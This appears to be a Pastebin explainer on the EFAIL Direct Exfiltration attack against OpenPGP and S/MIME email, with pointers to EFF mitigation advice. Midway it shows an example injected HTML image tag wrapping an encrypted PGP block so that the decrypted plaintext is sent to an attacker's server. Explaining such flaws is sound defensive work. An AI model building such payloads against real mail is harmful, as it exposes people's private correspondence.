Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @Hans W mentioned EFAIL vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that captures the plain-text of encrypted emails.
- There are two types of EFAIL exploits, Direct Exfiltration and CBC/CFB Gadget Attack. This article only addresses the Direct Exfiltration exploit.
- The Direct Exfiltration attack exploits the way email clients handle HTML externally requested objects such as graphics and styles immediately following decryption.
- The attacker injects an HTML statement requesting the external object. With the start tag and end tag straddling the encrypted body of the email.
- Example using a graphic request:
- <img scr=”http***cheaptrick.gif”
- -----BEGIN PGP MESSAGE-----
- Version: PGP Personal Security 7.0.3
- Encrypted Block of Text
- -----END PGP MESSAGE-----
- “>
- Immediately following decryption, the email client requests the external graphic and all the decrypted information between the tags is sent to and captured by the attacker.
- The simplicity of the exploit allows the attacker to inject the code to any detected encrypted email.
- On 29 May 2018, the EFF published How To Turn PGP Back On As Safely As Possible. Using versions of Thunderbird 52.8 using the Enigmail 2.0.6 plugin or above provides a measure of security. Read the entire article for settings and recommended methods to protect your privacy.
- Some of the more obvious mitigating measures should be closely evaluated. All email clients should be evaluated for their ability to mitigate this exploit.
- I plan to post other articles covering the CBC/CFB Gadget Attack and mitigation methos.
- These are the primary sources for this article. Be sure to review the links for more information and mitigating measures.
- EFAIL.DE
- PGP and EFAIL: Frequently Asked Questions
- I welcome any corrections, comments, and thoughts.
- EFAIL #Encryption #Decryption #Attack #Exploit #Vulnerability #PGP #S/MIME #OpenPGP #GPG #Email #EFF #Thunderbird #Enigmail
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement